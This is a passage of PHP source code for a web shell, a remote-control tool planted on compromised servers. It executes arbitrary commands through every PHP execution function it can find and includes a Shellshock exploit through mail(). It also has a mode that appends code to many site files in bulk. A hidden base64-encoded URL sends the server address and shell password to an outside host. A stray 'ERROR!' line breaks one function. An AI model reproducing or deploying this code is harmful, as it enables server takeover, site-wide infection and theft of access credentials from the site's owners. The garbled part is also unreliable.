while($row = @mysql_fetch_assoc($result))
{
array_push($fields,$row['Field']);
echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
}
echo '</tr>';
if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
$result = mysql_query($query,$conn);
$v = $p;
while($text = @mysql_fetch_assoc($result))
{
echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> </a> ';
echo '<a href="#" onclick="Delok(\'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> </a></td>';
foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
echo '</tr>'."\r\n";$v++;
}
echo '</table><div class="actall">';
$pagep=$page-1;
$pagen=$page+1;
echo " ".$row_num." ";
if($pagep>0) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'></a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'></a> "; else $pagenav.=" ";
if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'></a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'></a>"; else $pagenav.=" ";
$pagenav.=" [".$page."/".$pages."] <input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />";
echo $pagenav;
echo '</div>';
}
}
elseif(isset($_GET['insert']))
{
echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
$fieldnum = @mysql_num_fields($result);
echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
for($i =0;$i < $fieldnum;$i++)
{
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
}
echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
}
else
{
$query = 'SHOW TABLE STATUS';
$status = @mysql_query($query,$conn);
while($statu = @mysql_fetch_array($status))
{
$statusize[] = $statu['Data_length'];
$statucoll[] = $statu['Collation'];
}
$query = 'SHOW TABLES FROM '.$_GET['db'].';';
echo '</div><table border="0"><tr>';
echo '<td class="toptd" style="width:550px;"> </td>';
echo '<td class="toptd" style="width:80px;"> </td>';
echo '<td class="toptd" style="width:130px;"> </td>';
echo '<td class="toptd" style="width:70px;"> </td></tr>';
$result = @mysql_query($query,$conn);
$k = 0;
while($table = mysql_fetch_row($result))
{
$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
echo '<td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'"> </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> </a></td>';
echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
$k++;
}
echo '</table>';
}
}
}
else die('MYSQL,.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
if(!$BOOL and addslashes($query)!='') echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
break;
default: html_main($path,$shellname); break;
}
css_foot();
/*---doing---*/
function do_write($file,$t,$text)
{
$key = true;
$handle = @fopen($file,$t);
if(!@fwrite($handle,$text))
{
@chmod($file,0666);
$key = @fwrite($handle,$text) ? true : false;
}
@fclose($handle);
return $key;
}
function do_show($filepath){
$show = array();
$dir = dir($filepath);
while($file = $dir->read()){
if($file == '.' or $file == '..') continue;
$files = str_path($filepath.'/'.$file);
$show[] = $files;
}
$dir->close();
return $show;
}
function do_deltree($deldir){
$showfile = do_show($deldir);
foreach($showfile as $del){
if(is_dir($del)){
if(!do_deltree($del)) return false;
}elseif(!is_dir($del)){
@chmod($del,0777);
if(!@unlink($del)) return false;
}
}
@chmod($deldir,0777);
if(!@rmdir($deldir)) return false;
return true;
}
function do_showsql($query,$conn){
$result = @mysql_query($query,$conn);
html_n('<br><br><textarea cols="70" rows="15">');
while($row = @mysql_fetch_array($result)){
for($i=0;$i < @mysql_num_fields($result);$i++){
html_n(htmlspecialchars($row[$i]));
}
}
html_n('</textarea>');
}
function hmlogin($xiao=1){
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = postpass;
if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}}
}
function do_down($fd){
if(!@file_exists($fd)) msg('');
$fileinfo = pathinfo($fd);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($fd));
@readfile($fd);
exit;
}
function do_download($filecode,$file){
header("Content-type: application/unknown");
header('Accept-Ranges: bytes');
header("Content-length: ".strlen($filecode));
header("Content-disposition: attachment; filename=".$file.";");
echo $filecode;
exit;
}
function TestUtf8($text)
{if(strlen($text) < 3) return false;
$lastch = 0;
$begin = 0;
$BOM = true;
$BOMchs = array(0xEF, 0xBB, 0xBF);
$good = 0;
$bad = 0;
$notAscii = 0;
for($i=0; $i < strlen($text); $i++)
{$ch = ord($text[$i]);
if($begin < 3)
{ $BOM = ($BOMchs[$begin]==$ch);
$begin += 1;
continue; }
if($begin==4 && $BOM) break;
if($ch >= 0x80 ) $notAscii++;
if( ($ch&0xC0) == 0x80 )
{if( ($lastch&0xC0) == 0xC0 )
{$good += 1;}
else if( ($lastch&0x80) == 0 )
{$bad += 1; }}
else if( ($lastch&0xC0) == 0xC0 )
{$bad += 1;}
$lastch = $ch;}
if($begin == 4 && $BOM)
{return 2;}
else if($notAscii==0)
{return 1;}
else if ($good >= $bad )
{return 2;}
else
{return 0;}}
function File_Str($string)
{
return str_replace('//','/',str_replace('\\','/',$string));
}
function File_Write($filename,$filecode,$filemode)
{
$key = true;
$handle = @fopen($filename,$filemode);
if(!@fwrite($handle,$filecode))
{
@chmod($filename,0666);
$key = @fwrite($handle,$filecode) ? true : false;
}
@fclose($handle);
return $key;
}
function Exec_Run($cmd)
{
$res = '';
if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}
elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);}
elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("[email protected]","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}
return $res;
}
function File_Mode()
{
$RealPath = realpath('./');
$SelfPath = $_SERVER['PHP_SELF'];
$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}
function GetFileOwner($File) {
if(PATH_SEPARATOR==':'){
if(function_exists('posix_getpwuid')) {
$File = posix_getpwuid(fileowner($File));
}
return $File['name'];
}
}
function GetFileGroup($File) {
if(PATH_SEPARATOR==':'){
if(function_exists('posix_getgrgid')) {
$File = posix_getgrgid(filegroup($File));
}
return $File['name'];
}
}
function File_Size($size)
{
$kb = 1024;
$mb = 1024 * $kb;
$gb = 1024 * $mb;
$tb = 1024 * $gb;
if($size < $kb)
{
return $size." B";
}
else if($size < $mb)
{
return round($size/$kb,2)." K";
}
else if($size < $gb)
{
return round($size/$mb,2)." M";
}
else if($size < $tb)
{
return round($size/$gb,2)." G";
}
else
{
return round($size/$tb,2)." T";
}
}
function File_Read($filename)
{
$handle = @fopen($filename,"rb");
$filecode = @fread($handle,@filesize($filename));
@fclose($handle);
return $filecode;
}
function array_iconv($data, $output = 'utf-8') {
$encode_arr = array('UTF-8','ASCII','GBK','GB2312','BIG5','JIS','eucjp-win','sjis-win','EUC-JP');
$encoded = mb_detect_encoding($data, $encode_arr);
if (!is_array($data)) {
return mb_convert_encoding($data, $output, $encoded);
}
else {
foreach ($data as $key=>$val) {
$key = array_iconv($key, $output);
if(is_array($val)) {
$data[$key] = array_iconv($val, $output);
} else {
$data[$key] = mb_convert_encoding($data, $output, $encoded);
}
}
return $data;
}
}
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
function do_phpfun($cmd,$fun) {
$res = '';
switch($fun){
case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
case "shell_exec": $res = @shell_exec($cmd); break;
case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);break;
}
return $res;
}
if(isset($_GET['login'])=='geturl'){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = postpass;
$copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA');
$url=$copyurl.$serveru.'&passwd='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
function geturl(){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = postpass;
$copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA');
$url=$copyurl.$serveru.'&passwd='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
$show = do_show($dir);
foreach($show as $files){
if(is_dir($files) && $bool){
do_passreturn($files,$code,$type,$bool,$filetype,$shell);
}else{
if($files == $shell) continue;
switch($type){
case "guama":
if(debug($files,$filetype)){
do_write($files,"ab","\n".$code) ? html_n("--> $files<br>") : html_n("--> $files<br>");
}
break;
case "qingma":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
$newcode = str_replace($code,'',$filecode);
do_write($files,"wb",$newcode) ? html_n("--> $files<br>") : html_n("--> $files<br>");
}
break;
case "tihuan":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
$newcode = str_replace($code,$filetype,$filecode);
do_write($files,"wb",$newcode) ? html_n("--> $files<br>") : html_n("--> $files<br>");
}
break;
case "scanfile":
$file = explode('/',$files);
if(stristr($file[count($file)-1],$code)){
html_a("?eanver=editr&p=$files",$files);
echo '<br>';
}
break;
case "scancode":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
html_a("?eanver=editr&p=$files",$files);
echo '<br>';
}
break;
case "scanphp":
$fileinfo = pathinfo($files);
if($fileinfo['extension'] == $code){
$filecode = @file_get_contents($files);
if(muma($filecode,$code)){
html_a("?eanver=editr&p=".urlencode($files),"");
html_a("?eanver=del&p=".urlencode($files),"");
echo $files.'<br>';
}
}
break;
}
}
}
}
class PHPzip{
var $file_count = 0 ;
var $datastr_len = 0;
var $dirstr_len = 0;
var $filedata = '';
var $gzfilename;
var $fp;
var $dirstr='';
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function startfile($path = "web.zip"){
$this->gzfilename=$path;
$mypathdir=array();
do{
$mypathdir[] = $path = dirname($path);
}while($path != '.');
@end($mypathdir);
do{
$path = @current($mypathdir);
@mkdir($path);
}while(@prev($mypathdir));
if($this->fp=@fopen($this->gzfilename,"w")){
return true;
}
return false;
}
function addfile($data, $name){
$name = str_replace('\\', '/', $name);
if(strrchr($name,'/')=='/') return $this->adddir($name);
$dtime = dechex($this->unix2DosTime());
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$datastr = "PK\x03\x04";
$datastr .= "\x14\x00";
$datastr .= "\x00\x00";
$datastr .= "\x08\x00";
$datastr .= $hexdtime;
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
$datastr .= pack('v', strlen($name));
$datastr .= pack('v', 0);
$datastr .= $name;
$datastr .= $zdata;
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "PK\x01\x02";
$dirstr .= "\x00\x00";
$dirstr .= "\x14\x00";
$dirstr .= "\x00\x00";
$dirstr .= "\x08\x00";
$dirstr .= $hexdtime;
$dirstr .= pack('V', $crc);
$dirstr .= pack('V', $c_len);
$dirstr .= pack('V', $unc_len);
$dirstr .= pack('v', strlen($name) );
$dirstr .= pack('v', 0 );
$dirstr .= pack('v', 0 );
$dirstr .= pack('v', 0 );
$dirstr .= pack('v', 0 );
$dirstr .= pack('V', 32 );
$dirstr .= pack('V',$this->datastr_len );
$dirstr .= $name;
$this->dirstr .= $dirstr;
$this -> file_count ++;
$this -> dirstr_len += strlen($dirstr);
$this -> datastr_len += $my_datastr_len;
}
function adddir($name){
$name = str_replace("\\", "/", $name);
ERROR!
$datastr = "PK\x03\x04
\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "PK\x01\x02\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name;
$this->dirstr .= $dirstr;
$this -> file_count ++;
$this -> dirstr_len += strlen($dirstr);
$this -> datastr_len += $my_datastr_len;
}
function createfile(){
$endstr = "PK\x05\x06\x00\x00\x00\x00" .
pack('v', $this -> file_count) .
pack('v', $this -> file_count) .
pack('V', $this -> dirstr_len) .
pack('V', $this -> datastr_len) .
"\x00\x00";
fwrite($this->fp,$this->dirstr.$endstr);
fclose($this->fp);
}
}
function start_unzip($tmp_name,$new_name,$todir='zipfile'){
$zip = new ZipArchive() ;
if ($zip->open($tmp_name) !== TRUE) {
echo '';
}
$zip->extractTo($todir);
$zip->close();
echo ' <a href="?eanver=main&path='.urlencode($todir).'"></a> <a href="javascript:history.go(-1);"></a>';
}
function muma($filecode,$filetype){
$dim = array(
"php" => array("eval(","exec("),
"asp" => array("WScript.Shell","execute(","createtextfile("),
"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),
"jsp" => array("runtime.exec(")
);
foreach($dim[$filetype] as $code){
if(stristr($filecode,$code)) return true;
}
}
function debug($file,$ftype){
$type=explode('|',$ftype);
foreach($type as $i){
if(stristr($file,$i)) return true;
}
}
/*---string---*/
function str_path($path){
return str_replace('//','/',$path);
}
function msg($msg){
die("<script>window.alert('".$msg."');history.go(-1);</script>");
}
function uppath($nowpath){
$nowpath = str_replace('\\','/',dirname($nowpath));
return urlencode($nowpath);
}
function xxstr($key){
$temp = str_replace("\\\\","\\",$key);
$temp = str_replace("\\","\\\\",$temp);
return $temp;
}
/*---html---*/
function html_ta($url,$name){
html_n("<a href=\"$url\" target=\"_blank\">$name</a>");
}
function html_a($url,$name,$where=''){
html_n("<a href=\"$url\" $where>$name</a> ");
}
function html_img($url){
html_n("<img src=\"?img=$url\" border=0>");
}
function back(){
html_n("<input type='button' value='' onclick='history.back();'>");
}
function html_radio($namei,$namet,$v1,$v2){
html_n('<input type="radio" name="return" value="'.$v1.'" checked>'.$namei);
html_n('<input type="radio" name="return" value="'.$v2.'">'.$namet.'<br><br>');
}
function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
if($mode){
html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");
}else{
html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">");
}
}
function html_base(){
html_n('function base64encode(str){
var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var out, i, len;
var c1, c2, c3;
len = str.length;
i = 0;
out = "";
while (i < len) {
c1 = str.charCodeAt(i++) & 0xff;
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt((c1 & 0x3) << 4);
out += "==";
break;
}
c2 = str.charCodeAt(i++);
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt((c2 & 0xF) << 2);
out += "=";
break;
}
c3 = str.charCodeAt(i++);
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
out += base64EncodeChars.charAt(c3 & 0x3F);
}
return out;
}
function utf16to8(str) {
var out, i, len, c;
out = "";
len = str.length;
for(i = 0; i < len; i++) {
c = str.charCodeAt(i);
if ((c >= 0x0001) && (c <= 0x007F)) {
out += str.charAt(i);
} else if (c > 0x07FF) {
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
} else {
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
}
}
return out;
}
function utf8to16(str) {
var out, i, len, c;
var char2, char3;
out = "";
len = str.length;
i = 0;
while(i < len) {
c = str.charCodeAt(i++);
switch(c >> 4) {
case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
out += str.charAt(i-1);
break;
case 12: case 13:
char2 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
break;
case 14:
char2 = str.charCodeAt(i++);
char3 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x0F) << 12) |
((char2 & 0x3F) << 6) |
((char3 & 0x3F) << 0));
break;
}
}
return out;
}
');
}
function html_text($name,$cols,$rows,$value = ''){
html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>");
}
function html_select($array,$mode = '',$change = '',$name = 'class'){
html_n("<select name=$name $change>");
foreach($array as $name => $value){
if($name == $mode){
html_n("<option value=\"$name\" selected>$value</option>");
}else{
html_n("<option value=\"$name\">$value</option>");
}
}
html_n("</select>");
}
function html_font($color,$size,$name){
html_n("<font color=\"$color\" size=\"$size\">$name</font>");
}
function GetHtml($url)
{
$c = '';
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
if(function_exists('fsockopen')){
$link = parse_url($url);
$query=$link['path'].'?'.$link['query'];
$host=strtolower($link['host']);
$port=$link['port'];
if($port==""){$port=80;}
$fp = fsockopen ($host,$port, $errno, $errstr, 10);
if ($fp)
{
$out = "GET /{$query} HTTP/1.0\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$inheader=1;
while(!feof($fp))
{$line=fgets($fp,4096);
if($inheader==0){$contents.=$line;}
if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
}
fclose ($fp);
$c= $contents;
}
}
if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
$c = curl_exec($ch);
curl_close($ch);
}
if(empty($c) && ini_get('allow_url_fopen')){
$c = file_get_contents($url);
}
if(empty($c)){
echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";
}
if(!empty($c))
{
return $c;
}
}
function html_main($path,$shellname){
$serverip=gethostbyname($_SERVER['SERVER_NAME']);
print<<<END
<html><title>{$shellname}</title>
<table width='100%'><tr><td width='150' align='center'>{$serverip}</td><td><form method='GET' target='main'><input type='hidden' name='eanver' value='main'><input name='path' style='width:100%' value='{$path}'></td><td width='140' align='center'><input name='Submit' type='submit' value=''> <input type='submit' value='' onclick='main.location.reload()'></td></tr></form></table>
END;
html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'>");
html_n("</iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'>");
html_n("</iframe></td></tr></table></html>");
}
function islogin($shellname,$myurl){
print<<<END
<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>
<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='{$myurl}' target='_blank'>{$shellname}</a><br><br><form method='post'><input name='postpass' type='password' size='22'> <input type='submit' value=''><br><br><br><font color=#3399FF></font><br></div></center>
END;
}
function html_sql(){
html_input("text","sqlhost","localhost","<br>MYSQL","30");
html_input("text","sqlport","3306","<br>MYSQL","30");
html_input("text","sqluser","root","<br>MYSQL","30");
html_input("password","sqlpass","","<br>MYSQL","30");
html_input("text","sqldb","dbname","<br>MYSQL","30");
html_input("submit","sqllogin","","<br>");
html_n('</form>');
}
function Mysql_Len($data,$len)
{
if(strlen($data) < $len) return $data;
return substr_replace($data,'...',$len);
}
function html_n($data){
echo "$data\n";
}
/*---css---*/
function css_img($img){
$images = array(
"exe"=>
"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
"xhIAOw==",
"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".
"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".
"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
"txt"=>
"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
"UpPWG3Ig6Hq/XmRjuZwkAAA7",
"html"=>
"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
"ADs=",
"js"=>
"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
"a00AjYYBbc/o9HjNniUAADs=",
"xml"=>
"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
"IQA7",
"mp3"=>
"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
"img"=>
"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
"FxEAOw==",
"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".
"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".
